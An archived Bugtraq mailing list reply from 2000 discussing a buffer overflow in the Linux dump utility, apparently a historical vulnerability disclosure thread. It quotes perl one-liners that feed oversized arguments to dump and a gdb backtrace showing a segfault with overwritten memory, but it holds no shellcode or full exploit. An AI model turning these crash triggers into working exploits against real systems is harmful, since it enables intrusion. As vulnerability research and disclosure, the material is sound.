Home page logo

bugtraq logo Bugtraq mailing list archives

Re: [ Hackerslab bug_paper ] Linux dump buffer overflow
From: super () UDEL EDU (Derek Callaway)
Date: Wed, 1 Mar 2000 09:58:16 -0500

On Mon, 28 Feb 2000, ±è¿ëÁØ KimYongJun (99Á¹¾÷) wrote:

[ Hackerslab bug_paper ] Linux dump buffer overflow


[loveyou () loveyou SOURCES]$ dump  -f a `perl -e 'print "x" x 556'`
  DUMP: Date of this level 0 dump: Mon Feb 28 14:45:01 2000
  DUMP: Date of last level  dump: the epoch
  DUMP: Dumping 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx to a
 ÆÄÀÏ À̸§ÀÌ ³Ê¹« ±é´Ï´Ù while opening filesystem
Segmentation fault


Could this be a problem with glibc, as well? 

[super () white dump]$ pwd
[super () white dump]$ echo -e "ru -0 `perl -e 'print "A"x5000;'`\nbt" | gdb
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
welcome to change it and/or distribute copies of it under certain
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
This GDB was configured as "i386-redhat-linux"...
(gdb) Starting program: /usr/src/redhat/SOURCES/dump-0.4b4/dump/dump -0
<snipped long string>
---Type <return> to continue, or q <return> to quit---Program received
signal SIGSEGV, Segmentation fault.
getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
88      ../sysdeps/generic/getenv.c: No such file or directory.
(gdb) #0  getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
#1  0x400b3f4a in tzset_internal (always=1094795585) at tzset.c:144
#2  0x400b4ceb in __tz_convert (timer=0xbfffd790, use_localtime=1,
    tp=0x4011e4e0) at tzset.c:575
#3  0x400b08bc in localtime (t=0xbfffd790) at localtime.c:43
#4  0x400b07f8 in ctime (t=0xbfffd790) at ctime.c:32
#5  0x804adde in main (argc=1094795585, argv=0x41414141) at main.c:355
(gdb) [super () white dump]$

From this gdb session, it appears that there _could_ be a problem with
the way that glibc's time functions behave.

/* Derek Callaway <super () udel edu> char *sites[]={"http://www.geekwise.com";, 
   Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc";,
   (302) 837-8769           "http://www.homeworkhelp.org",0};  S () IRC  */

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]